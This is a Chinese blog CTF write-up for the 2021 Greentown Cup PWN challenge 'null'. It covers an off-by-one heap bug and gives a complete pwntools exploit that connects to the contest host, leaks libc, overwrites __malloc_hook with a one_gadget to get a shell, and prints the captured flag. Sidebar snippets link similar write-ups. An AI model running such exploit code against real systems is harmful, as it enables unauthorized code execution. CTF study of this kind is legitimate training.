2021年“绿城杯”网络安全大赛-PWN-null

最新推荐文章于 2023-05-29 15:30:26 发布
最新推荐文章于 2023-05-29 15:30:26 发布
阅读量306 收藏
点赞数
分类专栏: 2021年“绿城杯”网络安全大赛 文章标签: 网络安全 c语言 python 2021年“绿城杯” PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43264813/article/details/120559636
版权
本文解析了一道关于PWN-null的网络安全题目,涉及offbyone漏洞的利用技巧,通过分析add, delete, edit, show等函数,展示了如何构造payload,最终获取了DASCTF的旗面。
摘要由CSDN通过智能技术生成

2021年“绿城杯”网络安全大赛-PWN-null

题目名称:null
题目内容:off by…
题目分值:100.0
题目难度:容易
相关附件:null的附件13.txt

解题思路:

1.检查保护

在这里插入图片描述

2.函数分析

题目给了四个重要函数,add,delete,edit,show
add()
在这里插入图片描述
delete()
在这里插入图片描述edit()
在这里插入图片描述
show()
在这里插入图片描述

3.思路

发现有off by one漏洞,那我们利用off bye one + size错位
exp

from pwn import *

binary = "./null_pwn"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
# p = process(binary)
p = remote("82.157.5.28","51304")

elf = ELF(binary)
libc = ELF(lib)
context.log_level = "debug"

s = lambda buf: p.send(buf)
sl = lambda buf: p.sendline(buf)
sa = lambda delim, buf: p.sendafter(delim, buf)
sal = lambda delim, buf: p.sendlineafter(delim, buf)
sh = lambda: p.interactive()
r = lambda n=None: p.recv(n)
ra = lambda t=tube.forever:p.recvall(t)
ru = lambda delim: p.recvuntil(delim)
rl = lambda: p.recvline()
rls = lambda n=2**20: p.recvlines(n)

def add(id,size,content):
	sal("Your choice :","1")
	sal("Index:",str(id))
	sal("Size of Heap : ",str(size))
	sa("Content?:",content)
def free(id):
	sal("Your choice :","2")
	sal("Index:",str(id))
def show(id):
	sal("Your choice :","4")
	sal("Index :",str(id))
def edit(id,content):
	sal("Your choice :","3")
	sal("Index:",str(id))
	sa("Content?:",content)

add(0,0x88,"A")
add(1,0x18,"B")
free(0)
add(0,1,"A")
show(0)
libc.address = u64(ru("\x7f")[-6:]+"\x00\x00")-33-0x10 - libc.sym["__malloc_hook"]
info("libc base => 0x%x"%libc.address)
add(0,0x68,"A")

add(0,0x18,"A")
add(1,0x18,"B")
add(2,0x68,"C")
add(3,0x18,"D")

free(2)
edit(0,"\x00"*0x18+chr(0x71+0x20))
free(1)

add(4,0x18,"E")
add(5,0x58,"F")
edit(5,p64(libc.sym["__malloc_hook"]-0x23))
add(6,0x68,"G")
add(7,0x68,"H")
# edit(7,"A")

ogg = [_+libc.address for _ in (0x45226,0x4527a,0xf03a4,0xf1247)]
og  = ogg[1]
edit(7,"\x00"*(0x13-8)+p64(og)+p64(libc.sym["realloc"]+16)+"\n")

sal("Your choice :","1")
sal("Index:",str(0))
sal("Size of Heap : ",str(0x20))

sh()

DASCTF{e811a98a6a325d5519a3a8706c90c721}
pwn2021 绿城(部分)
woodwhale的博客
10-04 3565
pwn2021 绿城(部分) 前言 补题,这场没报名,比赛的时候机房唯一报名的战队pwn穿了(tql),就没去做了 1、uaf_pwn 简单的uaf,free之后之后没有置0,直接申请unsorted bin泄露libc,再double free改malloc_hook写入one_gadget exp如下 def add(size): sla(">","1") sla("size>",str(size)) def free(index): sla("&gt
2021-鹏城实验室网络安全技能大赛-pwn-babyheap 题解
lifanxin的博客
09-28 2506
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021的鹏程比赛的pwn题,题目链接如下:2021-鹏程-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
2021绿城网络安全大赛-PWN-GreentownNote
qq_43264813的博客
09-30 496
2021绿城网络安全大赛-PWN-GreentownNote 题目名称:GreentownNote 题目内容:欢迎参加绿城~ 题目分值:200.0 题目难度:中等 相关附件:GreentownNote的附件3.txt 解题思路: 1.检查保护 保护全开 2.函数分析 题目只给了add,show,delete add() show() delete() 3.思路 (1)首先free泄露libc (2)构造heap srop 照题目环境2.27,应该是攻击free_hook,把它的值改成set_
2021绿城网络安全大赛-PWN-ezuaf
qq_43264813的博客
09-30 326
2021绿城网络安全大赛-PWN-ezuaf 题目名称:ezuaf 题目内容:简单的uaf 题目分值:100.0 题目难度:容易 相关附件:ezuaf的附件24.txt 解题思路: 1.检查保护 2.函数分析 发现Delete中有uaf 3.思路 打malloc_hook exp from pwn import * #io = process('./uaf_pwn') io = remote('82.157.5.28',52402) elf = ELF('./uaf_pwn') libc
陇原战“疫“2021网络安全大赛 bbbaby和Magic
zylxixixi的博客
11-17 358
一、bbbaby 首先对程序进行分析 ,程序较为简单,提供了修改地址内容和输入任意大小内容的功能,存在栈溢出的可能。 因为事情多,就看了眼题,最开始我想使用利用栈溢出再使用chk_stack_fail泄露出libc版本信息,虽然成功打印出libc地址但是已经退出了程序。参考了大佬陇原战疫2021网络安全大赛-pwn-wp - LynneHuan - 博客园 , 后面的思路为首先利用提供的修改地址内容的功能,将chk_stack_fail的got地址修改为puts的plt地址,然后通过栈溢出
[BUUCTF-pwn] 鹏城_2018_easycalc
weixin_52640415的博客
02-09 334
保护基本全开,在add时有个off_by_null漏洞。fd位置只能修改。 unsigned __int64 m1add() { unsigned int v0; // ebx unsigned int v2; // [rsp+4h] [rbp-2Ch] BYREF size_t size; // [rsp+8h] [rbp-28h] BYREF __int64 v4; // [rsp+10h] [rbp-20h] BYREF unsigned __int64 v5; // [rsp
2021绿城网络安全大赛
09-30
2021绿城网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面中,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential ...
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
[BUUCTF-pwn] 鹏城_2018_overint
weixin_52640415的博客
02-08 903
老大的帽儿。题目分3部分,第1部分要求输入4个字节这4个字节经过运算得35 __int64 __fastcall sub_4007D1(__int64 a1, int a2) { int v3; // [rsp+18h] [rbp-8h] int i; // [rsp+1Ch] [rbp-4h] v3 = 0; for ( i = 1; i < a2; ++i ) { printf("v[i] is %d\n", (unsigned int)*(char *)(i +
长城2021 pwn
清霂的博客
09-20 854
长城20211.K1ng_in_h3Ap_I2.K1ng_in_h3Ap_II 菜鸡第一次在国内比赛做出两道题,害,长城比第五空间温柔多了,第五空间一道rop,之后就直接vm,musl都没学过,还有个c++逆向8出来。打完国赛(写了一道简单堆题,orw调一晚上没出来,服了)之后划水时间太长了,8月下旬才开始继续学堆,争取10月底前把vm,musl,mips,arm这种其他架构(不知道算不算)的pwn学习一下。 1.K1ng_in_h3Ap_I 题目给了3个字节libc地址,操作性还是挺强的,借用残留指针
pwn中利用off by null的一个思路,构造假chunk的难以触及pre_size咋整
最新发布
fzucaicai的博客
05-29 875
但是如果这个程序比较精明,把指针的free掉的时候清空了,这就需要好好利用这个off by null了,也就是利用这个off by null,去借助假的堆块把东西东西打出来,有时甚至能够double free(在2.27的glibc中直接double free的方法似乎已经不多见了,现在检查都很严格)。以上是unlink的源码,可以注意到,进行unlink操作的时候,构造假的fd,bk指针还不够呢,它还要去检查chunk的size和next_chunk的prev_size是否一致。
绿城-Misc-流量分析
qq_49422880的博客
03-15 3338
绿城-Misc-流量分析0x01 复现开始 0x01 复现开始 导出HTTP对象后开始浏览数据包,发现数据包中有奇怪的流量。 经过网上查询, 找到这是CVE-2021-3129 漏洞攻击特征,发现这是一种lavarel的流量数据包,是一个远程RCE的一个漏洞。这个流量是经过加密处理的,需要我们进行还原。 将AAA*去掉 把=00换为空 base64解码 <?php $str = 'P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00
鹏程2018 Pwn Writeup
Kaller的博客
12-05 1499
PWN  code   hash爆破(By:Apeng师傅): 得到wyBTs。 这里栈溢出,控制 ret后,“pop rdi ret”用来调用call。 1.leak_libc 把puts的got.plt表用puts函数输出 2.计算偏移,得到system和字符串/bin/sh 3.调用system。 from pwn import * context.log...
2021绿城网络安全大赛-Misc-流量分析
qq_43264813的博客
09-30 8490
2021绿城网络安全大赛-Misc-流量分析 题目名称:流量分析 题目内容:一道复杂的流量分析 题目分值:200.0 题目难度:中等 相关附件:流量分析的附件.zip 解题思路: 1.流量过一遍。发现.config.php 是 webshell。找攻击者如何写入 webshell。发现存在一些可疑的 POST 流量,UA 头是 python requests。通过返回包发现程序报错。使用 Laravel。 发现流量中可疑的字符串。 2.网上查找资料发现是 CVE-2021-3129 漏洞攻击特征。
pwn2021 东华(部分)
woodwhale的博客
10-31 3658
pwn2021 东华(部分) 1、cpp1 典中典之堆溢出,改俩堆块重叠进入unsorted bin,然后申请其中一个回来,就能泄露libc。 之后就是堆溢出改fd为free_hook写入system #!/usr/bin/python # -*- coding: UTF-8 -*- # ----------------------------------- # @File : exp.py # @Author : woodwhale # @Time : 2021/10/31 12
2019新生 pwn writeup
Kni9hT's Blog
11-18 714
新生被吊打,大佬们tql…本来周五打完就应该写wp的,颓废了一个周末,周一晚上开始写。 wp分开吧,每个方向一个wp(不是全栈!!!) 其实pwn题目有点坑…前面的没学过二进制的web手也能做,后面两题做出来的人就很少(主要是我太菜了) 五道pwn题在文末都有网盘链接 ** 0x00 babyrip ** IDA看一下主要函数 int pwn() { char v1; // [rsp+0h]...
绿盟NSCTF(CCTF)2017 pwn writeup
jmp esp
07-22 6109
前言比赛有无数值得吐槽的地方,其中最主要的是,题目给了pwn的libc,然而,特么是错的,也就是说虽然给了libc,但是其实还是靠运气/当做没有libc解,顺手记录一下这两个水题。pwn1分析mainint __cdecl main() { alarm(0x1u); setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); p
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值